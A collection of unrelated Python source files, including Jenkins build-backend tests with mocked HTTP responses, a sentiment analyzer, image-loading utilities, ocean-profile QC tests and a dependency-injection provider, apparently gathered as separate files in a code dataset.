db.session.commit()
replacement_step = builder.create_job(job, replaces=failstep)
# new jobstep should still be part of same job/phase
assert replacement_step.job == job
assert replacement_step.phase == failstep.phase
# make sure .steps actually includes the new jobstep
assert len(failstep.phase.steps) == 2
# make sure replacement id is correctly set
assert failstep.replacement_id == replacement_step.id
assert replacement_step.data == {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'uri': None,
'master': 'http://jenkins.example.com',
}
class CancelStepTest(BaseTestCase):
@responses.activate
def test_queued(self):
responses.add(
responses.POST, 'http://jenkins.example.com/queue/cancelItem?id=13',
match_querystring=True, status=302)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'item_id': 13,
'job_name': 'server',
'master': 'http://jenkins.example.com',
}, status=Status.queued)
builder = self.get_builder()
builder.cancel_step(step)
assert step.result == Result.aborted
assert step.status == Status.finished
@responses.activate
def test_active(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/stop/',
body='', status=302)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'job_name': 'server',
'master': 'http://jenkins.example.com',
}, status=Status.in_progress)
builder = self.get_builder()
builder.cancel_step(step)
assert step.status == Status.finished
assert step.result == Result.aborted
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_timeouts_sync_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
# The job is not yet complete after this sync step so no logs yet.
builder.sync_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source is None
step.data['timed_out'] = True
builder.cancel_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == JENKINS_LOG_NAME
assert source.project == self.project
assert source.date_created == step.date_started
assert step.data.get('log_offset') == 7
bucket_name = step.id.hex + '-jenkins'
artifact_name = step.data['log_artifact_name']
artifact = ArtifactStoreMock('').get_artifact(bucket_name, artifact_name)
assert artifact.name == artifact_name
assert artifact.path == JENKINS_LOG_NAME
assert artifact.size == 7
assert artifact.state == ArtifactState.UPLOADED
assert ArtifactStoreMock('').get_artifact_content(bucket_name, artifact_name).getvalue() == 'Foo bar'
class SyncStepTest(BaseTestCase):
@responses.activate
def test_waiting_in_queue(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_pending.json'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.status == Status.queued
@responses.activate
def test_cancelled_in_queue(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_cancelled.json'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.status == Status.finished
assert step.result == Result.aborted
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_queued_to_active(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_success_result(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_success.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
assert step.status == Status.finished
assert step.result == Result.passed
assert step.date_finished is not None
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_failed_result(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
assert step.status == Status.finished
assert step.result == Result.failed
assert step.date_finished is not None
def test_present_manifest(self):
build = self.create_build(self.project)
job = self.create_job(build=build)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
artifacts = [self.create_artifact(step, 'manifest.json')]
builder = self.get_builder()
builder.verify_final_artifacts(step, artifacts)
assert not FailureReason.query.filter(
FailureReason.step_id == step.id
).first()
def test_missing_manifest_result(self):
build = self.create_build(self.project)
job = self.create_job(build=build)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, status=Status.finished)
builder = self.get_builder()
builder.verify_final_artifacts(step, [])
assert FailureReason.query.filter(
FailureReason.step_id == step.id,
FailureReason.reason == 'missing_manifest_json'
).first()
assert step.result == Result.infra_failed
@responses.activate
@mock.patch('changes.backends.jenkins.builder.time')
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_result_slow_log(self, mock_time):
mock_time.time.return_value = time.time()
def log_text_callback(request):
# Zoom 10 minutes into the future; this should cause the console
# downloading code to bail
mock_time.time.return_value += 10 * 60
data = "log\n" * 10000
return (200, {'X-Text-Size': str(len(data))}, data)
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add_callback(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
callback=log_text_callback)
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
assert len(step.logsources) == 1
bucket_name = step.id.hex + '-jenkins'
artifact_name = step.data['log_artifact_name']
assert "LOG TRUNCATED" in ArtifactStoreMock('').\
get_artifact_content(bucket_name, artifact_name).getvalue()
class SyncGenericResultsTest(BaseTestCase):
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_does_sync_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == JENKINS_LOG_NAME
assert source.project == self.project
assert source.date_created == step.date_started
assert step.data.get('log_offset') == 7
bucket_name = step.id.hex + '-jenkins'
artifact_name = step.data['log_artifact_name']
artifact = ArtifactStoreMock('').get_artifact(bucket_name, artifact_name)
assert artifact.name == artifact_name
assert artifact.path == JENKINS_LOG_NAME
assert artifact.size == 7
assert artifact.state == ArtifactState.UPLOADED
assert ArtifactStoreMock('').get_artifact_content(bucket_name, artifact_name).getvalue() == 'Foo bar'
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_does_save_artifacts(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_with_artifacts.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
expected_artifacts_data = dict()
expected_artifacts_data['foobar.log'] = {
"displayPath": "foobar.log",
"fileName": "foobar.log",
"relativePath": "artifacts/foobar.log",
}
expected_artifacts_data['foo/tests.xml'] = {
"displayPath": "tests.xml",
"fileName": "tests.xml",
"relativePath": "artifacts/foo/tests.xml",
}
expected_artifacts_data['tests.xml'] = {
"displayPath": "tests.xml",
"fileName": "tests.xml",
"relativePath": "artifacts/tests.xml",
}
for name, data in expected_artifacts_data.iteritems():
artifact = Artifact.query.filter(
Artifact.name == name,
Artifact.step == step,
).first()
assert artifact.data == data
class ArtifactsManagerMatchTest(BaseTestCase):
def test_standard(self):
builder = self.get_builder()
mgr = builder.get_artifact_manager(mock.Mock())
assert not mgr.can_process('build_report.log')
def test_fetch_jenkins(self):
builder = self.get_builder(debug_config={'fetch_jenkins_logs': True})
mgr = builder.get_artifact_manager(mock.Mock())
assert mgr.can_process('build_report.log')
class SyncArtifactTest(BaseTestCase):
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_sync_artifact_xunit(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/xunit.xml',
body=SAMPLE_XUNIT,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='xunit.xml', data={
"displayPath": "xunit.xml",
"fileName": "xunit.xml",
"relativePath": "artifacts/xunit.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
test_list = list(TestCase.query.filter(
TestCase.job_id == job.id
))
assert len(test_list) == 3
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_sync_artifact_coverage(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/coverage.xml',
body=SAMPLE_COVERAGE,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='coverage.xml', data={
"displayPath": "coverage.xml",
"fileName": "coverage.xml",
"relativePath": "artifacts/coverage.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
cover_list = list(FileCoverage.query.filter(
FileCoverage.job_id == job.id
))
assert len(cover_list) == 2
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_sync_artifact_file(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/foo.bar',
body=SAMPLE_COVERAGE,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='foo.bar', data={
"displayPath": "foo.bar",
"fileName": "foo.bar",
"relativePath": "artifacts/foo.bar"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
class SyncTestArtifactsTest(BaseTestCase):
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.models.testresult.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_sync_testartifacts(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/xunit.xml',
body=SAMPLE_XUNIT_TESTARTIFACTS,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='xunit.xml', data={
"displayPath": "xunit.xml",
"fileName": "xunit.xml",
"relativePath": "artifacts/xunit.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
test_artifacts = list(TestArtifact.query)
test = TestCase.query.first()
assert len(test_artifacts) == 1
test_artifact = test_artifacts[0]
assert test_artifact.file.get_file().read() == "sample_content"
assert test_artifact.name == "sample_name.txt"
assert str(test_artifact.type) == "Text"
assert test_artifact.test == test
class JenkinsIntegrationTest(BaseTestCase):
"""
This test should ensure a full cycle of tasks completes successfully within
the jenkins builder space.
"""
# it's possible for this test to infinitely hang due to continuous polling,
# so let's ensure we set a timeout
@pytest.mark.timeout(5)
@mock.patch('changes.config.redis.lock', mock.MagicMock())
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.jobs.sync_job_step.ArtifactStoreClient', ArtifactStoreMock)
@eager_tasks
@responses.activate
def test_full(self):
from changes.jobs.create_job import create_job
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
# TODO: move this out of this file and integrate w/ buildstep
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
body=self.load_fixture('fixtures/GET/queue_item_by_job_id.xml'))
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_success.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
artifacts_store_requests_re = re.compile(r'http://localhost:1234/buckets/.+/artifacts')
# Simulate test type which doesn't interact with artifacts store.
responses.add(
responses.GET, artifacts_store_requests_re,
body='',
status=404)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
plan = self.create_plan(self.project)
self.create_step(
plan, order=0, implementation='changes.backends.jenkins.buildstep.JenkinsBuildStep', data={
'job_name': 'server',
'jenkins_url': 'http://jenkins.example.com',
},
)
self.create_job_plan(job, plan)
job_id = job.id.hex
build_id = build.id.hex
create_job.delay(
job_id=job_id,
task_id=job_id,
parent_task_id=build_id,
)
job = Job.query.get(job_id)
assert job.status == Status.finished
assert job.result == Result.passed
assert job.date_created
assert job.date_started
assert job.date_finished
phase_list = job.phases
assert len(phase_list) == 1
assert phase_list[0].status == Status.finished
assert phase_list[0].result == Result.passed
assert phase_list[0].date_created
assert phase_list[0].date_started
assert phase_list[0].date_finished
step_list = phase_list[0].steps
assert len(step_list) == 1
assert step_list[0].status == Status.finished
assert step_list[0].result == Result.passed
assert step_list[0].date_created
assert step_list[0].date_started
assert step_list[0].date_finished
assert step_list[0].data == {
'item_id': '13',
'queued': False,
'log_offset': 7,
'log_artifact_name': JENKINS_LOG_NAME,
'jenkins_bucket_name': step_list[0].id.hex + '-jenkins',
'job_name': 'server',
'build_no': 2,
'uri': 'https://jenkins.build.itc.dropbox.com/job/server/2/',
'master': 'http://jenkins.example.com',
}
node = step_list[0].node
assert node.label == 'server-ubuntu-10.04 (ami-746cf244) (i-836023b7)'
assert [n.label for n in node.clusters] == ['server-runner']
source = LogSource.query.filter_by(job=job).first()
assert source.name == JENKINS_LOG_NAME
assert source.step == step_list[0]
assert source.project == self.project
assert source.date_created == job.date_started
bucket_name = step_list[0].id.hex + '-jenkins'
artifact_name = step_list[0].data['log_artifact_name']
artifact = ArtifactStoreMock('').get_artifact(bucket_name, artifact_name)
assert artifact.name == artifact_name
assert artifact.path == JENKINS_LOG_NAME
assert artifact.size == 7
assert artifact.state == ArtifactState.UPLOADED
assert ArtifactStoreMock('').get_artifact_content(bucket_name, artifact_name).getvalue() == 'Foo bar'
|
142695
|
import nltk
class Analyzer():
"""Implements sentiment analysis."""
def __init__(self, positives, negatives):
"""Initialize Analyzer."""
self.negatives=[]
self.positives=[]
with open ("negative-words.txt") as negative:
for line in negative:
if not line.startswith((" ", ";")):
self.negatives.extend(line.split())
with open ("positive-words.txt") as positive:
for line in positive:
if not line.startswith((" ", ";")):
self.positives.extend(line.split())
# TODO
def analyze(self, text):
"""Analyze text for sentiment, returning its score."""
tokenizer = nltk.tokenize.TweetTokenizer()
tokens = tokenizer.tokenize(text)
score = 0
for token in tokens:
if token in self.negatives:
score -= 1
elif token in self.positives:
score += 1
# TODO
return score
|
142709
|
class UPGRADE_EVENT:
'''
Event type of Device Message Center
'''
FIRST_PACKET = 'first_packet'
BEFORE_WRITE = 'before_write'
AFTER_WRITE = 'after_write'
BEFORE_COMMAND='before_command'
AFTER_COMMAND='after_command'
FINISH = 'finish'
ERROR = 'error'
PROGRESS = 'progress'
class UPGRADE_GROUP:
FIRMWARE = 'firmware'
BEFORE_ALL = 'before_all'
AFTER_ALL = 'after_all'
from .firmware_worker import FirmwareUpgradeWorker
from .ethernet_sdk_9100_worker import SDKUpgradeWorker as EthernetSDK9100UpgradeWorker
from .sdk_8100_worker import SDKUpgradeWorker as SDK8100UpgradeWorker
from .sdk_9100_worker import SDKUpgradeWorker as SDK9100UpgradeWorker
from .jump_application_worker import JumpApplicationWorker
from .jump_bootloader_worker import JumpBootloaderWorker
|
142711
|
import torch
from torchtext.datasets import DATASETS
class BatchTextClassificationData(torch.utils.data.IterableDataset):
def __init__(self, dataset_name, batch_size=16):
super(BatchTextClassificationData, self).__init__()
self._iterator = DATASETS[dataset_name](split='train')
self.batch_size = batch_size
def __iter__(self):
_data = []
for i, item in enumerate(self._iterator):
_data.append(item)
if len(_data) >= self.batch_size:
yield _data
_data = []
if len(_data) > 0:
yield _data
|
142730
|
import os
import sys
import argparse
import importlib
import multiprocessing
import cv2 as cv
import torch.backends.cudnn
env_path = os.path.join(os.path.dirname(__file__), '..')
if env_path not in sys.path:
sys.path.append(env_path)
import ltr.admin.settings as ws_settings
def run_training(train_module, train_name, cudnn_benchmark=True):
"""Run a train scripts in train_settings.
args:
train_module: Name of module in the "train_settings/" folder.
train_name: Name of the train settings file.
cudnn_benchmark: Use cudnn benchmark or not (default is True).
"""
# This is needed to avoid strange crashes related to opencv
cv.setNumThreads(0)
torch.backends.cudnn.benchmark = cudnn_benchmark
print('Training: {} {}'.format(train_module, train_name))
settings = ws_settings.Settings()
if settings.env.workspace_dir == '':
raise Exception('Setup your workspace_dir in "ltr/admin/local.py".')
settings.module_name = train_module
settings.script_name = train_name
settings.project_path = 'ltr/{}/{}'.format(train_module, train_name)
expr_module = importlib.import_module('ltr.train_settings.{}.{}'.format(train_module, train_name))
expr_func = getattr(expr_module, 'run')
expr_func(settings)
def main():
parser = argparse.ArgumentParser(description='Run a train scripts in train_settings.')
parser.add_argument('train_module', type=str, help='Name of module in the "train_settings/" folder.')
parser.add_argument('train_name', type=str, help='Name of the train settings file.')
parser.add_argument('--cudnn_benchmark', type=bool, default=True, help='Set cudnn benchmark on (1) or off (0) (default is on).')
args = parser.parse_args()
run_training(args.train_module, args.train_name, args.cudnn_benchmark)
if __name__ == '__main__':
multiprocessing.set_start_method('spawn', force=True)
main()
|
142733
|
import numpy as np
import requests
from io import BytesIO
from pathlib import Path
from PIL import Image
from urllib.parse import urlparse
# Use a Chrome-based user agent to avoid getting needlessly blocked.
USER_AGENT = (
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/51.0.2704.103 Safari/537.36'
)
def open_image(uri):
"""Opens and returns image at `uri`.
Always returns a HxWxC `np.array` containing the image, ready to be
consumed by any Terran algorithm. If the image is grayscale or has an alpha
channel, it'll get converted into `RGB`, so the number of channels will
always be 3.
Parameters
----------
uri : str or pathlib.Path
URI pointing to an image, which may be a filesystem location or a URL.
Returns
-------
numpy.ndarray
Array of size HxWxC containing the pixel values for the image, as
numpy.uint8.
"""
# Check if `uri` is a URL or a filesystem location.
if isinstance(uri, Path):
image = Image.open(uri)
elif urlparse(uri).scheme:
response = requests.get(uri, headers={'User-Agent': USER_AGENT})
image = Image.open(BytesIO(response.content))
else:
image = Image.open(Path(uri).expanduser())
image = np.asarray(image.convert('RGB'))
if len(image.shape) == 2:
# Grayscale image, turn it to a rank-3 tensor anyways.
image = np.stack([image] * 3, axis=-1)
return image
def resolve_images(path, batch_size=None):
"""Collects the paths of all images under `path`, yielding them in batches.
Ensures that the image is valid before returning it by attempting to open
it with PIL.
Parameters
----------
path : str or pathlib.Path
Path to recursively search for images in.
Yields
------
pathlib.Path or [pathlib.Path]
Path to every valid image found under `path`. If `batch_size` is
`None`, will return a single `pathlib.Path`. Otherwise, returns a list.
"""
if not isinstance(path, Path):
path = Path(path).expanduser()
batch = []
for f in path.glob('**/*'):
if not f.is_file():
continue
try:
Image.open(f).verify()
except OSError:
continue
# If no `batch_size` specified, just return the path.
if batch_size is None:
yield path.joinpath(f)
continue
batch.append(path.joinpath(f))
if len(batch) >= batch_size:
yield batch
batch = []
|
142747
|
import qctests.Argo_global_range_check
import util.testingProfile
import numpy
from util import obs_utils
##### Argo_global_range_check ---------------------------------------------------
def test_Argo_global_range_check_temperature():
'''
Make sure AGRC is flagging temperature excursions
'''
# should fail despite rounding
p = util.testingProfile.fakeProfile([-2.500000001], [100], latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
truth[0] = True
assert numpy.array_equal(qc, truth), 'failed to flag temperature slightly colder than -2.5 C'
# -2.5 OK
p = util.testingProfile.fakeProfile([-2.5], [100], latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
assert numpy.array_equal(qc, truth), 'incorrectly flagging -2.5 C'
# 40 OK
p = util.testingProfile.fakeProfile([40], [100], latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
assert numpy.array_equal(qc, truth), 'incorrectly flagging 40 C'
# should fail despite rounding
p = util.testingProfile.fakeProfile([40.0000001], [100], latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
truth[0] = True
assert numpy.array_equal(qc, truth), 'failed to flag temperature slightly warmer than 40 C'
def test_Argo_global_range_check_pressure():
'''
Make sure AGRC is flagging pressure excursions
'''
# should fail despite rounding
p = util.testingProfile.fakeProfile([5], obs_utils.pressure_to_depth([-5.00000001], 0.0), latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
truth[0] = True
assert numpy.array_equal(qc, truth), 'failed to flag pressure slightly below -5 '
# -5 OK
p = util.testingProfile.fakeProfile([5], obs_utils.pressure_to_depth([-5], 0.0), latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
assert numpy.array_equal(qc, truth), 'incorrectly flagging pressure of -5'
|
142752
|
import inspect
from typing import Callable, Dict, Hashable, Optional
from .service import Parameterized
from .._internal import API
from .._internal.utils import FinalImmutable, SlotRecord, debug_repr
from ..core import (Container, DependencyDebug, DependencyValue, Provider,
Scope)
@API.private
class FactoryProvider(Provider[Hashable]):
def __init__(self) -> None:
super().__init__()
self.__factories: Dict[FactoryDependency, Factory] = dict()
def __repr__(self) -> str:
return f"{type(self).__name__}(factories={list(self.__factories.keys())})"
def clone(self, keep_singletons_cache: bool) -> 'FactoryProvider':
p = FactoryProvider()
if keep_singletons_cache:
factories = {
k: (f.copy() if f.dependency is not None else f)
for k, f in self.__factories.items()
}
else:
factories = {
k: (f.copy(keep_function=False) if f.dependency is not None else f)
for k, f in self.__factories.items()
}
p.__factories = factories
return p
def exists(self, dependency: Hashable) -> bool:
# For now we don't support multiple factories for a single dependency. Neither
# is sharing the dependency with another provider. Simply because I don't see a
# use case where it would make sense.
# Open for discussions though, create an issue if you a use case.
if isinstance(dependency, Parameterized):
dependency = dependency.wrapped
return (isinstance(dependency, FactoryDependency)
and dependency in self.__factories)
def maybe_debug(self, dependency: Hashable) -> Optional[DependencyDebug]:
dependency_factory = (dependency.wrapped
if isinstance(dependency, Parameterized)
else dependency)
if not isinstance(dependency_factory, FactoryDependency):
return None
try:
factory = self.__factories[dependency_factory]
except KeyError:
return None
dependencies = []
wired = []
if factory.dependency is not None:
dependencies.append(factory.dependency)
if isinstance(factory.dependency, type) \
and inspect.isclass(factory.dependency):
